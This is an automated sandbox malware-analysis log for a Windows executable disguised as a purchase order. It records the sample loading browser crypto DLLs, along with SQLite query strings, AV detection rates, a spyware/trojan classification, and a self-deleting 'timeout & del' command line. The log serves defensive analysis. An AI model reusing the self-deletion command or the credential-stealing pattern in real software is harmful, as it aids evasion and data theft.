                    Source: PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7162736684.000000001DCC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7191917075.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
                    Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSection loaded: crtdll.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
                    Source: PO No. 3200005919.exeReversingLabs: Detection: 61%
                    Source: PO No. 3200005919.exeVirustotal: Detection: 47%
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile read: C:\Users\user\Desktop\PO No. 3200005919.exeJump to behavior
                    Source: PO No. 3200005919.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403489
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\OverfurnishedJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\nsqF39C.tmpJump to behavior
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/56@2/2
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_004020FE CoCreateInstance,1_2_004020FE
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404814
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
